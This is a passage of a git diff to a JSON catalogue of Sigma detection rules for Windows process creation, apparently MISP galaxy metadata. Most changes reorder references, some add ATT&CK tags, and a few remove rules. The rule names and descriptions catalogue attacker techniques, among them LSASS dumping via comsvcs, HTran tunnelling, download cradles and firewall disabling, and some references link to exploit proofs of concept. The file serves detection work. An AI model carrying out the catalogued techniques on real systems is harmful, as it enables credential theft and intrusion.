"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" ], "tags": [ @@ -56848,9 +57749,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/frack113/status/1555830623633375232", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/frack113/status/1555830623633375232", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" ], "tags": [ @@ -56960,29 +57861,6 @@ "uuid": "ac1c92b4-ac81-405a-9978-4604d78cc47e", "value": "Potential Binary Proxy Execution Via VSDiagnostics.EXE" }, - { - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2023/01/18", - "falsepositive": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" - ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.viettelcybersecurity.com/saml-show-stopper/", - "https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py", - "https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml" - ], - "tags": "No established tags" - }, - "uuid": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "value": "Manage Engine Java Suspicious Sub Process" - }, { "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "meta": { @@ -56996,8 +57874,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" ], "tags": [ @@ -57020,13 +57898,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Wietze/status/1542107456507203586", - "https://twitter.com/Hexacorn/status/1224848930795552769", - "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py", "https://twitter.com/SBousseaden/status/1167417096374050817", + "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://twitter.com/Wietze/status/1542107456507203586", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml" ], "tags": [ @@ -57137,11 +58015,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://twitter.com/christophetd/status/1164506034720952320", "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" ], "tags": [ @@ -57242,12 +58120,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml" ], "tags": [ @@ -57362,12 +58240,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/eral4m/status/1479106975967240209", - "https://twitter.com/eral4m/status/1479080793003671557", - "https://twitter.com/Hexacorn/status/885258886428725250", - "https://twitter.com/nas_bench/status/1433344116071583746", - "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/eral4m/status/1479080793003671557", + "https://twitter.com/nas_bench/status/1433344116071583746", + "https://twitter.com/Hexacorn/status/885258886428725250", + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/eral4m/status/1479106975967240209", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml" ], "tags": [ @@ -57400,8 +58278,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2288", "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", + "https://adsecurity.org/?p=2288", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" ], "tags": [ @@ -57434,8 +58312,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ @@ -57469,8 +58347,8 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" ], "tags": [ @@ -57528,8 +58406,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1451237393017839616", "https://github.com/Tylous/ZipExec", + "https://twitter.com/SBousseaden/status/1451237393017839616", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml" ], "tags": [ @@ -57571,8 +58449,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_st0pp3r_/status/1560072680887525378", "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester.yml" ], "tags": [ @@ -57752,8 +58630,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" ], "tags": [ @@ -57983,9 +58861,9 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://twitter.com/lefterispan/status/1286259016436514816", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml" ], "tags": [ @@ -58019,10 +58897,10 @@ "logsource.product": "windows", "refs": [ "https://blog.alyac.co.kr/1901", - "https://en.wikipedia.org/wiki/Hangul_(word_processor)", - "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" ], "tags": [ @@ -58206,8 +59084,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml" ], @@ -58264,9 +59142,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/nas_bench/status/1534957360032120833", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", - "https://twitter.com/nas_bench/status/1534957360032120833", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml" ], "tags": [ @@ -58350,8 +59228,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/HiwinCN/HTran", "https://github.com/cw1997/NATBypass", + "https://github.com/HiwinCN/HTran", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml" ], "tags": [ @@ -58385,9 +59263,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.nirsoft.net/utils/nircmd.html", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml" ], "tags": [ @@ -58587,8 +59465,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", + "https://twitter.com/0gtweet/status/1674399582162153472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml" ], "tags": [ @@ -58687,8 +59565,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase", + "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml" ], "tags": [ @@ -58721,9 +59599,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", - "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", + "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", + "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml" ], "tags": [ @@ -58747,8 +59625,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml" ], @@ -58866,8 +59744,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1478116126005641220", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", + "https://twitter.com/mrd0x/status/1478116126005641220", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml" ], "tags": [ @@ -58949,8 +59827,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml" ], "tags": [ @@ -59067,8 +59945,8 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", - "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_usage.yml" ], "tags": [ @@ -59168,9 +60046,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://twitter.com/nao_sec/status/1530196847679401984", "https://twitter.com/_JohnHammond/status/1531672601067675648", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml" ], "tags": [ @@ -59328,10 +60206,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1211636381086339073", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://twitter.com/SBousseaden/status/1211636381086339073", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" ], "tags": [ @@ -59449,8 +60327,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml" ], "tags": [ @@ -59549,12 +60427,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", "https://www.joeware.net/freetools/tools/adfind/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml" ], @@ -59662,8 +60540,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml" ], "tags": [ @@ -59765,8 +60643,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_change.yml" ], "tags": [ @@ -59800,9 +60678,9 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", - "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml" ], "tags": [ @@ -59835,8 +60713,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", + "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml" ], @@ -59874,8 +60752,20 @@ "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "value": "Abusing IEExec To Download Payloads" }, @@ -59892,8 +60782,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml" ], "tags": [ @@ -59976,9 +60866,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml" ], "tags": [ @@ -60049,8 +60939,20 @@ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "value": "Potential COM Objects Download Cradles Usage - Process Creation" }, @@ -60067,8 +60969,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", + "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml" ], "tags": [ @@ -60160,8 +61062,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core", "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", + "https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml" ], "tags": [ @@ -60194,10 +61096,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", - "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" ], "tags": [ @@ -60256,8 +61158,22 @@ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005" + ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "970823b7-273b-460a-8afc-3a6811998529", "value": "Uncommon One Time Only Scheduled Task At 00:00" }, @@ -60489,9 +61405,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", + "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml" ], "tags": [ @@ -60512,20 +61428,20 @@ "value": "Odbcconf.EXE Suspicious DLL Location" }, { - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", + "description": "Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023/01/12", "falsepositive": [ - "Unknown" + "Legitimate packages that make use of external binaries such as Windows Terminal" ], "filename": "proc_creation_win_susp_appx_execution.yml", - "level": "high", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" ], "tags": [ @@ -60533,7 +61449,7 @@ ] }, "uuid": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "value": "Suspicious Windows App Activity" + "value": "Potentially Suspicious Windows App Activity" }, { "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", @@ -60558,40 +61474,6 @@ "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "value": "Mshtml DLL RunHTMLApplication Abuse" }, - { - "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "meta": { - "author": "Aaron Herman", - "creation_date": "2022/10/01", - "falsepositive": [ - "Legitimate scripts located on other partitions such as \"D:\"" - ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", - "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "related": [ - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "value": "Wscript Execution from Non C Drive" - }, { "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", "meta": { @@ -60641,8 +61523,29 @@ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", 